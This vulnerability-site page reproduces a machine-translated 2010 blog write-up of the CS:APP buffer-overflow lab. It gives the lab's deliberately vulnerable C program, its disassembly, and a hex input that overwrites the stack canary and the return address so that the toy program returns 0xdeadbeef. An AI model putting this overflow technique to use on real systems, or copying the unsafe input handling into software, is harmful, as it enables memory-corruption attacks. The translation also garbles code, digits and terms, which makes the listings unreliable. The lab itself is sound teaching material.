Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:62201026282
HistoryMar 01, 2010 - 12:00 a.m.

Ubuntu 9.10 environment buffer overflow attack experiment-vulnerability warning-the black bar safety net

2010-03-0100:00:00
佚名
www.myhack58.com
13
JSON

Environment: Ubuntu 9.10 kernel 2.6.31 gcc version: 4.4.1
This is the csapp the in-depth understanding of the computer system on the question directly in the original program run time to achieve the buffer overflow attack has been impossible to achieve, unless you are using the version of the very low kernel and gcc, as gcc 3.4.3 on.

The first is the king Dragon Dragon classmates did this question, I followed do the following, it took quite a long time, during which it thanked the king Sloan Sloan School of patience to explain, thanks~~~

The original title is as follows:
/* Bomb program that is solved using a buffer overflow attack */

#include <stdio. h>
#include <stdlib. h>
#include <ctype. h>

/* Like gets, except that characters are typed as pairs of hex digits.
Nondigit characters are ignored. Stops when encounters newline */
char *getxs(char dest)
{
int c;
int even = 1; / Have read even number of digits /
int otherd = 0; / Other hex digit of pair */
char *sp = dest;
while ((c = getchar()) != EOF && c != ’\n’) {
if (isxdigit©) {
int val;
if (’0’ <= c && c <= ’9’)
val = c - ’0’;
else if (’A’ <= c && c <= ’F’)
val = c - ’A’ + 1 0;
else
val = c - ’a’ + 1 0;
if (even) {
otherd = val;
even = 0;
} else {
*sp++ = otherd * 1 6 + val;
even = 1;
}
}
}
*sp++ = ’\0’;
return dest;
}

/* $begin getbuf-c */
int getbuf()
{
char buf[1 2];
getxs(buf);
return 1;
}

void test()
{
int val;
printf(“Type Hex string:”);
val = getbuf();
printf(“getbuf returned 0x%x\n”, val);
}
/* $end getbuf-c */

int main()
{

int buf[1 6];
/* This little hack is an attempt to get the stack to be in a
stable position
*/
int offset = (((int) buf) & 0xFFF);
int *space = (int *) alloca(offset);
space = 0; / So that don’t get complaint of unused variable */
test();
return 0;
}

Normal program exit always returns 1, Now requirements by buffer overflow, so the program returns 0xdeadbeef。
Note: (Due to the current gcc in code compilation of code to add%gs buffer overflow in the authentication mechanism, so if the gcc version is higher, the present experiments only in gdb under completion)

The following URL is the king of the dragon Dragon shoes way to achieve his gcc version is 4. 3. 3: The http://hi.baidu.com/featherain/blog/item/99207b4ede9b2cf3d62afc1e.html by in the buffer zone of the implant a period of attack code, and then let the getbuf() ret to a buffer attack code out, and finally let the attack code returns text () of. If in gcc 4.4.1 and 4.3.2 and 3.4.3 following this method will be reported“segmentation fault”because it is from code is off jump to the stack.

The following is the realization of buffer overflow attacks in another way.
Input: the|any twelve character encoding||%gs:0x14||any 8 character encoding||getbuf stack Zhen base address||text()in the second printf()the Address||0 1 0 0 0 0 0 0 ||7 1 8 7 0 4 0 8||ef be ad de|

The following explains why to use input above which characters to implement buffer overflow attacks.
With the gcc compiler generates buffbomb. c the executable program, use the objdump disassembly found the getbuf function is as follows:
080485c0 <getbuf>:
2 1 5 80485c0: 5 5 push %ebp
2 1 6 80485c1: 8 9 e5 mov %esp,%ebp
2 1 7 80485c3: 8 3 ec 2 8 sub $0x28,%esp
2 1 8 80485c6: 6 5 a1 1 4 0 0 0 0 0 0 mov %gs:0x14,%eax
2 1 9 80485cc: 8 9 4 5 f4 mov %eax,-0xc(%ebp)
2 2 0 80485cf: 3 1 c0 xor %eax,%eax
2 2 1 80485d1: 8d 4 5 e8 lea-0x18(%ebp),%eax
2 2 2 80485d4: 8 9 0 4 2 4 mov %eax,(%esp)
2 2 3 80485d7: e8 4 4 ff ff ff call 8 0 4 8 5 2 0 <getxs>
2 2 4 80485dc: b8 0 1 0 0 0 0 0 0 mov $0x1,%eax
2 2 5 80485e1: 8b 5 5 f4 mov-0xc(%ebp),%edx
2 2 6 80485e4: 6 5 3 3 1 5 1 4 0 0 0 0 0 0 xor %gs:0x14,%edx
2 2 7 80485eb: 7 5 0 2 jne 80485ef <getbuf+0x2f>
2 2 8 80485ed: c9 leave
2 2 9 80485ee: c3 ret
2 3 0 80485ef: 9 0 nop
2 3 1 80485f0: e8 5 7 fe ff ff call 804844c <__stack_chk_fail@plt>
2 3 2 80485f5: 8d 7 4 2 6 0 0 lea 0x0(%esi,%eiz,1),%esi
2 3 3 80485f9: 8d bc 2 7 0 0 0 0 0 0 0 0 lea 0x0(%edi,%eiz,1),%edi

Find the 2 1 Line 7: sub $0x28, %esp is the getbuf()application. 4 0 bytes of stack space, we apply an array from the current base address offset 2 4 octets start, is responsible for checking buffer overflow of%gs:0x14 is from the current base address offset 1 2 bytes.
(Note: 4.4. 1 the previous version of the char array from the current base address offset 1 to 6 bytes at the beginning, is responsible for checking buffer overflow of%gs:0x14 is from the current base address offset 4 bytes start)

See the test()function:
0 8 0 4 8 6 0 0 <test>:
2 3 6 8 0 4 8 6 0 0: 5 5 push %ebp
2 3 7 8 0 4 8 6 0 1: 8 9 e5 mov %esp,%ebp
2 3 8 8 0 4 8 6 0 3: 8 3 ec 1 8 sub $0x18,%esp
2 3 9 8 0 4 8 6 0 6: c7 4 4 2 4 0 4 6 0 8 7 0 4 movl $0x8048760,0x4(%esp)
2 4 0 804860d: 0 8
2 4 1 804860e: c7 0 4 2 4 0 1 0 0 0 0 0 0 movl $0x1,(%esp)
2 4 2 8 0 4 8 6 1 5: e8 f2 fd ff ff call 804840c <__printf_chk@plt>
2 4 3 804861a: e8 a1 ff ff ff call 80485c0 <getbuf>
2 4 4 804861f: c7 4 4 2 4 0 4 7 1 8 7 0 4 movl $0x8048771,0x4(%esp)
2 4 5 8 0 4 8 6 2 6: 0 8
2 4 6 8 0 4 8 6 2 7: c7 0 4 2 4 0 1 0 0 0 0 0 0 movl $0x1,(%esp)
2 4 7 804862e: 8 9 4 4 2 4 0 8 mov %eax,0x8(%esp)
2 4 8 8 0 4 8 6 3 2: e8 d5 fd ff ff call 804840c <__printf_chk@plt>
2 4 9 8 0 4 8 6 3 7: c9 leave
2 5 0 8 0 4 8 6 3 8: c3 ret
2 5 1 8 0 4 8 6 3 9: 8d b4 2 6 0 0 0 0 0 0 0 0 lea 0x0(%esi,%eiz,1),%esi
From 2 4 4 line up is the key, the 2 4 6 line is the pointer to the location is set to 1, thereby guessing the%esp is stored may be printfThe number of parameters, a 2 4 line 7 is put in eax the value of the voltage to the esp+8 locations, from the above getbuf code we know eax is stored getbuf return value, so we only need to call the call printf before the 0xdeadbeef pressed into esp+8 position you can achieve our purpose.

Normal when the entire stack of case as follows:

%eax

0x8048771

0x1 <-— esp

The return address of the call getbuf the next instruction

%ebp

8 bytes

%gs:0x14

1 2 bytes

So far the overall ideas already have: through the buffer overflow to modify the printf-related parameters and getbuf()ret address to make it skip the call getbuf and call the printf between the code directly to perform printf on. Namely the following forms:

0xdeadbeef

0x8048771

0x1 <-— esp

Return address call printf address

%ebp

8 bytes

%gs:0x14

1 2 bytes

The specific implementation process is as follows:

  1. In getbuf create a breakpoint, give the%gs:0x14 value, read out the ebp stored in the value
  2. Enter any of the Twelve characters to fill the char[1 2],continue to enter the%gs:0x14 value, forcing the program to check no buffer overflow, fill the stack Zhen and the rest of the 8 bytes, the input ebp in the stored value, the test()call printf address, 0x1,0x8048771,0xdeadbeef

Namely: aa aa aa aa aa aa aa aa aa aa aa aa 0 0 9 9 dd 7 8 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 d8 ef ff bf 3 2 8 6 0 4 0 8 0 1 0 0 0 0 0 0 7 1 8 7 0 4 0 8 ef bf ad de

Summary;although to achieve a return 0xdeadbeef purpose, but the practical application of little value, especially in%gs:0x14 every time the value changes, so only in gdb mode%gs:0x14 the value and then in the overflow time is intended to be added back, it will not be program discover buffer overflow, as the gcc becomes more intelligent, giving people can take advantage of the machine is also more and more less Ah ~~~

JSON